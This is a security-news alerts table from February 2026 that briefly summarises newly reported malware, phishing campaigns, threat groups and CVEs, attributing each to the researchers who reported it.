ALERTS FEBRUARY 2026 2025 2024 2023 2022
HOME AI
APT
BOTNET
CAMPAIGN
CRIME
CRYPTOCURRENCY
EXPLOIT
HACKING
GROUP
OPERATION
PHISHING
RANSOM
SPAM
VIRUS
VULNEREBILITY
| 2024
2025
2026 January(30)
February(48)
March(53)
April(50)
May(9)
June(0)
July(0)
August(0) SEPTEMBER(0)
October(0)
November(0)
December(0)
DATE |
NAME |
INFO |
CATEGORY |
SUBCATE |
| 27.2.26 | Steaelite RAT | Steaelite is a newly emerged remote access trojan (RAT) that grants attackers extensive, browser-based command over compromised Windows computers. | VIRUS | |
| 27.2.26 | Open-source payloads spread via malicious npm packages | Tenable researchers recently identified a dangerous npm package named “ambar-src” that underscores the increase in modern supply chain threats targeting the npm landscape. Within just a few days of its release, the package amassed approximately 50,000 downloads before being removed from the public registry. | VIRUS | |
| 27.2.26 | Fake Microsoft 365 Admin Center Loading Screen Stages Iframe-Delivered Credential Phishing | Symantec has observed a credential-phishing campaign using the urgent email subject “Immediate Action Required: Account Lockout [ID: <6-char>-2026]” to pressure recipients into acting quickly. | PHISHING | |
| 27.2.26 | Operation MacroMaze Targets Europe | Operation MacroMaze is a campaign attributed to the Swallowtail threat group (a.k.a. APT28 or Fancy Bear). Over several months, this campaign targeted entities in Central and Western Europe to exfiltrate data. | OPERATION | |
| 27.2.26 | Mercenary Akula Threat Group Targets European Financial Institution with RMM Payload | A report by researchers at BlueVoyant shares insights into recent activity that targeted a European financial institution. The campaign leveraged socially engineered spearphishing and multiple archive files to deliver a legitimate remote administration tool, Remote Manipulator System (RMS). | GROUP | |
| 27.2.26 | UnsolicitedBooker threat group deploys LuciDoor and MarsSnake backdoor variants | UnsolicitedBooker threat group, has recently shifted its crosshairs from Saudi Arabian organizations to telecommunications providers in Kyrgyzstan and Tajikistan. According to a recent Positive Technologies report, the threat actor employs two distinct C++ backdoors called LuciDoor and MarsSnake. | GROUP | |
| 27.2.26 | XMRig delivery campaign leverages BYOVD techniques | An advanced cryptojacking operation that relies on distribution of counterfeit software packages to infect computers with a XMRig cryptocurrency miner has been reported by the cybersecurity researchers from Trellix. Once installed, the malware acts as a complex, multi-stage threat. | CAMPAIGN | |
| 27.2.26 | NetSupport RAT delivery attributed to the GrayCharlie threat actor | GrayCharlie is a financially motivated threat actor that overlaps significantly with the cybercriminal group SmartApeSG. According to a newly published intelligence report by Insikt Group researchers, GrayCharlie specializes in breaching vulnerable WordPress websites and injecting malicious JavaScripts. | VIRUS | |
| 27.2.26 | Moonrise RAT | Security researchers at ANY.RUN have identified Moonrise, a newly developed Go-based Remote Access Trojan (RAT) that aims at traditional static detection evasion. The malware provides the threat actors with comprehensive remote control over infected endpoints. | VIRUS | |
| 27.2.26 | Medusa Ransomware distributed by the Lazarus threat group | North Korean state-backed attackers are now using the Medusa ransomware and are continuing to mount extortion attacks on the U.S. healthcare sector. | RANSOM | |
| 27.2.26 | Financial Lures Leveraged to Spread Winos 4.0 to Taiwan | Phishing campaigns delivering Winos 4.0 (ValleyRAT) malware to targets in Taiwan are attributed to the Monarch (aka Silver Fox) threat group. The campaigns leveraged financial lures, specifically tax- and invoice-related documents, to deliver their payloads. | VIRUS | |
| 27.2.26 | PromptSpy Android malware | PromptSpy is a new Android malware variant utilizing generative AI to manipulate user interfaces dynamically. As reported by researchers from ESET, the malware leverages Google’s Gemini AI specifically to maintain a persistent presence on the infected devices. | VIRUS | |
| 23.2.26 | Massiv Android Trojan | Cybersecurity experts from Threat Fabric have identified a new Android banking trojan dubbed Massiv. Massiv operates by granting cybercriminals total remote access to an infected deviceS | VIRUS | |
| 23.2.26 | New deployment campaign of the CastleLoader and LummaStealer malware | A resurgence in LummaStealer activity has been observed by the researchers from Bitdefender. Despite a major law enforcement disruption in May 2025 that neutralized over 2,300 command-and-control domains, the group seems to continue their global attacks.S | CAMPAIGN | |
| 23.2.26 | CrescentHarvest cyberespionage campaign | Acronis Threat Research Unit has identified a cyberespionage operation dubbed CrescentHarvest, which aims at surveillance and data theft and is targeted at supporters of ongoing protests in Iran. Observed since early January, the campaign exploits geopolitical tension by using social engineering to trick victims. | CAMPAIGN | |
| 23.2.26 | CVE-2026-1281 and CVE-2026-1340 - Ivanti EPMM RCE Vulnerabilities | In late January, Ivanti released updates to address two critical vulnerabilities affecting Endpoint Manager Mobile (EPMM). Identified as CVE-2026-1281 (CVSS 9.8) and CVE-2026-1340 (CVSS 9.8), these vulnerabilities can allow unauthenticated remote code execution to attackers via code injection. Details of active exploitation has been shared in a report by Unit 42 researchers at Palo Alto Networks. | VULNEREBILITY | |
| 23.2.26 | Cuckoo infostealer spread via ClickFix techniques | A recent malware delivery campaign discovered by the researchers from Hunt.io involves attackers leveraging social engineering and typosquatted domains - specifically mimicking the popular Homebrew package manager - to deceive users into execution of malicious binaries. | VIRUS | |
| 23.2.26 | An Invitation to Phishing | Calendar invite spam is an increasingly observed tactic used by threat actors to steal credentials. Socially engineered emails designed to entice a recipient to accept a calendar invite direct potential victims to unwittingly share their login information. | PHISHING | |
| 23.2.26 | Interlock Ransomware: Activity Continues Into 2026 | Recent leak-site activity indicates Interlock operations continued into early 2026, with multiple newly listed alleged victims appearing in January–February. This follows a steady cadence of claimed postings in prior years: 67 in 2025 and 14 in 2024. | RANSOM | |
| 23.2.26 | Prometei botnet deployment campaign | Researchers from eSentire’s Threat Response Unit identified recently an attempt to deploy the Prometei botnet on a Windows Server within the construction sector. Active since at least 2016 Prometei is a multifaceted malware strain capable of remote control, credential theft, Monero crypto-mining, and lateral network movement. | BOTNET | |
| 16.2.26 | SSHStalker Linux botnet variant | Flare’s research team has identified "SSHStalker," a previously unreported Linux botnet operation. Rather than employing complex modern Command and Control (C2) servers, SSHStalker utilizes a resilient IRC infrastructure to manage various bot variants, including Tsunami and Keiten. | BOTNET | |
| 16.2.26 | Threat Actors Increasingly Integrate GenAI into Active Campaigns | A report by researchers of the Google Threat Intelligence Group highlights recent activity related to artificial intelligence as used by malicious actors. | CAMPAIGN | |
| 16.2.26 | IIS Servers Targeted in Long Term SEO Poisoning Campaigns | China-linked threat actors have been targeting IIS servers in ongoing SEO poisoning campaigns. According to a report by researchers at Elastic, these actors primarily compromise servers in Asian countries to push content directing visitors to illegal gambling or other illicit websites. | CAMPAIGN | |
| 16.2.26 | Japan-Targeted iCloud+ Payment Failure Scam Uses JavaScript-Driven Phishing Kit | A phishing campaign targeting Japanese users abuses a familiar iCloud+ “payment failed” theme to steal Apple Account credentials and, in a second step, harvest payment card details. | SPAM | |
| 12.2.26 | HTM Phishing Across Private and Public Sectors: Targeted Filenames + Telegram Exfil | Over the past few days Symantec has observed a lightweight credential-harvesting campaign that delivers an HTML/HTM attachment directly via email (EMAIL → HTM). HTM filenames pattern (recipient_company_domain_quote.htm) strongly suggests the actor is generating lures per target organization. | PHISHING | |
| 12.2.26 | Dating App Masquerade: SpyMax Targets Minglers in France | Android SpyMax has been observed in France, targeting minglers by posing as a dating app (“France Social: Rencontre, Chat”). If downloaded and installed, the app (France social.apk) quickly pivots from “dating” to privilege acquisition, prompting the victim to enable a custom Accessibility Service and grant Device Administrator rights. | VIRUS | |
| 12.2.26 | Guloader is Always Evolving | GuLoader is a sophisticated malware downloader primarily used to deliver Remote Access Trojans and information stealers. Active since 2019, the malware is known for its use of anti-analysis techniques which allow it to conceal its functionality from automated tools and security researchers. | VIRUS | |
| 12.2.26 | NetSupport RAT deployed in latest campaign attributed to the Stan Ghouls threat group | Stan Ghouls threat group (aka Bloody Wolf) has been launching targeted attacks against organizations within Russia, Kyrgyzstan, Kazakhstan, and Uzbekistan since at least 2023. These attacks are characterized by utilizing campaign-specific infrastructure and leveraging custom Java-based malware loaders. | VIRUS | |
| 12.2.26 | PCHunter tool abused by ransomware actors | PCHunter is a Windows system analysis and security tool designed for in-depth inspection and malware removal. It is often used by security professionals for deep detection of malicious activity, including rootkits, hidden processes, and unauthorized kernel drivers | RANSOM | |
| 12.2.26 | DKnife - an Adversary-in-the-Middle (AitM) framework | DKnife is a sophisticated Adversary-in-the-Middle (AitM) framework designed to monitor gateways and manipulate network traffic. | HACKING | |
| 12.2.26 | CVE-2026-21858 - n8n Workflow vulnerability | CVE-2026-21858 is a recently disclosed critical (CVSS score 10.0) Arbitrary File Read vulnerability affecting n8n, which is a workflow automation tool. If successfully exploited the flaw might allow attackers to access files on the underlying vulnerable server through execution of certain form-based workflows. The vulnerability has been already patched in product version 1.121.0 or newer. | VULNEREBILITY | |
| 12.2.26 | From Spreadsheet to Control: How XWorm RAT Infiltrates Systems | XWorm is a well-established, highly modular Remote Access Trojan (RAT). Features available in this RAT include data exfiltration, encrypted C2 communications, full system control, and surveillance. Researchers at Fortinet have published details about recent phishing campaigns attempting to deliver this payload through various financial or business-themed lures. | VIRUS | |
| 12.2.26 | CVE-2025-69200 - phpMyFAQ vulnerability | CVE-2025-69200 is a recently disclosed high severity (CVSS score 7.5) Information Disclosure vulnerability affecting phpMyFAQ, which is an open-source, database-driven FAQ (Frequently Asked Questions) web application. | VULNEREBILITY | |
| 12.2.26 | PowerTool abused by ransomware actors | PowerTool is a Windows security utility used to detect and analyze rootkits, bootkits, hidden processes, and other kernel-level threats. Recent threat intelligence indicates that multiple ransomware operators are abusing PowerTool in an attempt to disable security products. | RANSOM | |
| 12.2.26 | Malicious ClawHub Skills | Researchers from Koi Security have recently audited the ClawHub “skills” marketplace and found 341 malicious skills—most attributed to a coordinated campaign they call “ClawHavoc.” | VIRUS | |
| 12.2.26 | Opportunistic MassLogger campaign: .Z archives and PDF-lookalike executables | Symantec has observed a MassLogger malspam campaign that used routine “business workflow” themes—procurement, invoices, shipping paperwork, and document transmittals—while impersonating two legitimate organizations. | CAMPAIGN | |
| 12.2.26 | CVE-2026-24061 - GNU InetUtils vulnerability | CVE-2026-24061 is a recently disclosed critical (CVSS score 9.8) Argument Injection vulnerability affecting the GNU InetUtils telnetd service in versions from 1.9.3 through 2.7. | VULNEREBILITY | |
|
9.2.26 |
CVE-2026-23760 is a recently disclosed critical (CVSS score 9.3) Authentication Bypass vulnerability affecting SmarterTools SmarterMail software, which is an email, groupware, and collaboration server designed as an alternative to enterprise collaboration solutions such as Microsoft Exchange. |
|||
|
9.2.26 |
Darktrace reports a multi-stage macOS phishing campaign where a lure email delivers an AppleScript file disguised as a Microsoft document (for example, “.docx.scpt”) and depends on a user click to execute. |
|||
|
9.2.26 |
||||
|
9.2.26 |
Recent reports exposed a campaign targeting Kazakh and Afghan organizations with the KazakRAT remote access trojan in January 2026. The actors behind it may have been operating since August 2022. |
|||
|
9.2.26 |
WinRAR CVE-2025-8088 Drives Targeted Espionage in Southeast Asia |
Check Point Research ties espionage campaigns in Southeast Asia to a China-nexus actor dubbed Amaranth-Dragon, targeting government and law enforcement. |
||
|
9.2.26 |
Billbug Threat Actor Compromised Notepadd++ Update Infrastructure |
Notepad++, a popular text editor for Windows, was the victim of a supply-chain attack by Chinese state-linked hackers identified as Billbug (aka Lotus Blossom, Spring Dragon). |
||
|
9.2.26 |
Recent Black Basta Ransomware Campaign Embeds Vulnerable Driver in Payload |
A recent Black Basta attack campaign was notable because the ransomware contained a bring-your-own-vulnerable-driver (BYOVD) defense evasion component embedded within the ransomware payload itself |
||
|
9.2.26 |
Operation Neusploit: Swallowtail Exploits CVE-2026-21509 to Deliver Backdoors |
Swallowtail (aka APT28 or Fancy Bear) is a Russian espionage group observed exploiting a recently disclosed Microsoft Office Security Feature Bypass Vulnerability, identified as CVE-2026-21509. In a campaign tagged "Operation Neusploit" by researchers at Zscaler, the group distributes specially crafted Office documents in RTF format. |
||
|
9.2.26 |
CVE-2026-21509: Microsoft Office Security Feature Bypass Vulnerability |
Microsoft has issued an emergency fix for a high-severity Microsoft Office zero‑day flaw, tracked as CVE-2026-21509 (CVSS Score: 7.8). Attackers are reported to be actively exploiting it to bypass security features via malicious documents that are distributed together with social engineering lures to trick users into opening them. |
||
|
9.2.26 |
Researchers have published a deeper technical breakdown of DynoWiper, a new data-wiping malware used in a December 2025 attack on a Polish energy company’s IT systems, expanding on earlier reporting and identifying similarities to the ZOV wiper observed in Ukraine earlier in the year. |
|||
|
9.2.26 |
Infostealers are a commonly observed payload in malware campaigns. They are often distributed through social engineering tactics such as the popular ClickFix method, malvertising, or disguised as installers for popular software. A recent Microsoft report highlights this activity, specifically focusing on macOS and Python-based stealers. |